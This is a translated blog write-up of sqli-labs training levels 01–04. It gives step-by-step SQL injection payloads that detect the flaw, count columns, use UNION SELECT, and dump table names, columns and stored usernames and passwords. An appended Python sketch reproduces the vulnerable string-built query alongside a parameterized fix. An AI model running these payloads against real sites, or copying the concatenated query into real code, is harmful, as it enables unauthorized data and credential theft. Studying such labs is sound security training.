sql-labs
2022-07-02 19:44:00 【Young seed_】
- What is sql-labs?
- Pass-01, 02
- Determining whether injection exists
- Determining the number of fields
- union select: finding the echoed position
- Database name and logged-in user name
- Table names
- Column names
- Data
- Quick method (note that the id value must be 0 or lower, otherwise it will not succeed)
- Pass-03
- Pass-04
What is sql-labs?
SQL injection is a Web security vulnerability that occurs at the database layer of an application; it is one of the most common and simplest website vulnerabilities. The root cause is that the program does not check or sanitize the legitimacy of user input, so an attacker can append extra SQL to the SQL statements predefined in the Web application and perform unauthorized operations without the administrator's knowledge. In this way the database server is tricked into executing arbitrary unauthorized queries, from which further data can be obtained.
Recommended video: [Repost] SQL injection, SSTI & Docker escape, HTB CTF - GoodGame (Bilibili)
Pass-01, 02
These two are not bad...
According to online references, Pass-01 is single-quote-based SQL injection and Pass-02 is integer-based injection.
Determining whether injection exists
Pass id=1 via GET, and you can see the web page change.
Pass id=2 via GET.
After passing id=15 via GET, the page is abnormal.
Could it be that the ?id=1 parameter is spliced into the SQL statement and executed as SQL code?
Try ?id=1 and 1=2... unchanged.
The knowledge for Pass-02 starts here; try closing the quote: ?id=1'and 1=1-- za (the letters after the comment are arbitrary...)
Note the space (format), otherwise an error will be reported, as pictured.
?id=1'and 1=2-- zaa: page exception (possible SQL injection).
Determining the number of fields
Use order by to probe the fields, from 1 up to 4: 3 is normal, but 4 gives an abnormal page (so there are three fields).
union select: finding the echoed position
Input ?id=1'union select 1,2,3-- zaa; the previous result is still shown.
1,2,3 only occupy three positions (order by earlier gave 3), so any expression can be used there.
So change id=1 to id=15 (because then the page has no result of its own).
Note: the article says that, knowing there are only three columns, to find the position of each column use ?id=0' union select 1,2,3 --+ (note that the id value must be 0 or lower, otherwise it will not succeed).
Database name and logged-in user name
Change position 2 to database(), which displays the database name of the current page: security.
To query the current database name and the current logged-in user name, use ?id=0' union select 1,database(),user() -- zaa
user() replaces position 3 and is the current logged-in user name.
Table names
?id=15'union select 1,table_name,3 from information_schema.tables where table_schema='security'-- zaa
- table_name: the table name
- information_schema is a database of its own
- table_schema literally refers to the library (database) name

Second table (the first one can then be expressed with limit 0,1)
?id=15'union select 1,table_name,3 from information_schema.tables where table_schema='security' limit 1,1-- zaa
Third (change the leading 1 in limit 1,1 to 2)
i.e. ...?id=15'union select 1,table_name,3 from information_schema.tables where table_schema='security' limit 2,1-- zaa
and so on...
Column names
?id=15'union select 1,column_name,3 from information_schema.columns where table_schema='security' and table_name='emails'-- zaa
emails: replace according to the table
Example:
?id=15'union select 1,column_name,3 from information_schema.columns where table_schema='security' and table_name='referers'-- zaa
Data
?id=15'union select 1,id,3 from emails-- zaa
As above, emails can be replaced according to the table.
Quick method (note that the id value must be 0 or lower, otherwise it will not succeed)
Change position 2 to database() to display the database name: security.
Reference article...
Table names
After the database name, enumerate the tables with ?id=0' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security'),3 --+
All table names in one step...
Column names
?id=0' union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='emails'),3 --+
emails: replace according to the table
Data
Format: ?id=0' union select 1,(select group_concat(concat_ws(0x7e, column name of the table, column name of the table)) from table name),3 --+
0x7e (the ~ character) should be the separator placeholder...; that position can also be a column name of the table, as seen in 02 and 03.
01
?id=0' union select 1,(select group_concat(concat_ws(0x7e,id,email_id)) from emails),3 --+ Blast, and get the following.
02
?id=0' union select 1,(select group_concat(concat_ws(0x7e,username,password)) from users),3 --+ Blast, and get the following.
03
?id=0' union select 1,(select group_concat(concat_ws(id,username,password)) from users),3 --+ Blast, and get the following.
Pass-03
Looking at the source code... it turns out to be wrapped in parentheses, so the input is not treated as code and the earlier payloads fail.
So add a ) after the '.
| Determining whether injection exists | ?id=1')and 1=1-- za |
|---|---|
| Determining the number of fields | ?id=1')order by 1-- za |
| union select: finding the echoed position | ?id=1')union select 1,2,3-- zaa |
| Table names | ?id=15')union select 1,table_name,3 from information_schema.tables where table_schema='security'-- zaa |
| Column names | ?id=15')union select 1,column_name,3 from information_schema.columns where table_schema='security' and table_name='emails'-- zaa |
| Data | ?id=15')union select 1,id,3 from emails-- zaa |
Pass-04
From the figure, compared with 03 the single quotes become double quotes...
| Determining whether injection exists | ?id=1")and 1=1-- za |
|---|---|
| Determining the number of fields | ?id=1")order by 1-- za |
| union select: finding the echoed position | ?id=1")union select 1,2,3-- zaa |
| Table names | ?id=15")union select 1,table_name,3 from information_schema.tables where table_schema='security'-- zaa |
| Column names | ?id=15")union select 1,column_name,3 from information_schema.columns where table_schema='security' and table_name='emails'-- zaa |
| Data | ?id=15")union select 1,id,3 from emails-- zaa |
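As an added illustration (not part of the original post or of the sqli-labs code): a small Python reproduction of the Pass-01 and Pass-03 query contexts, running the page's own probes against constructed sample rows, next to the parameterized lookup that stops them. The table, row values and the use of sqlite3 in place of the lab's MySQL are assumptions.

```python
import sqlite3

# Constructed sample data standing in for the lab's three-column users table.
SAMPLE_ROWS = [(1, "Dumb", "Dumb"), (2, "Angelina", "I-kill-you")]

# Vulnerable pattern: the id parameter is pasted into the query text.
# The templates reproduce the closing contexts of Pass-01 (id='...') and
# Pass-03 (id=('...')); Pass-04's double-quoted form is MySQL-specific and
# is left out here.
TEMPLATES = {
    "pass-01": "SELECT id, username, password FROM users WHERE id='{id}' LIMIT 0,1",
    "pass-03": "SELECT id, username, password FROM users WHERE id=('{id}') LIMIT 0,1",
}


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users(id INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_ROWS)
    return conn


def vulnerable_lookup(conn, level, raw_id):
    """Concatenate raw_id into the query the way the lab code does."""
    sql = TEMPLATES[level].format(id=raw_id)
    try:
        return conn.execute(sql).fetchone()   # None = blank page, tuple = echoed row
    except sqlite3.Error as exc:
        return ("ERROR", str(exc))            # the lab's "page exception"


def safe_lookup(conn, raw_id):
    """Hardened form: reject non-integer ids, then bind the value as a parameter."""
    try:
        uid = int(raw_id)
    except ValueError:
        return None                           # input never reaches the SQL text
    sql = "SELECT id, username, password FROM users WHERE id=? LIMIT 1"
    return conn.execute(sql, (uid,)).fetchone()


if __name__ == "__main__":
    db = make_db()
    print(vulnerable_lookup(db, "pass-01", "1' and 1=2-- za"))         # None: blank page
    print(vulnerable_lookup(db, "pass-01", "1' order by 4-- za"))      # ERROR: only 3 columns
    print(vulnerable_lookup(db, "pass-01", "0' union select 1,2,3-- za"))   # (1, 2, 3) echoed
    print(vulnerable_lookup(db, "pass-03", "1' and 1=1-- za"))         # ERROR: unbalanced ')'
    print(vulnerable_lookup(db, "pass-03", "0') union select 1,2,3-- za"))  # (1, 2, 3) again
    print(safe_lookup(db, "0' union select 1,2,3-- za"))               # None: rejected
```

With id=0 no real row matches, so the union row is the first (and only) row the page echoes, which is why the post insists on an id of 0 or lower.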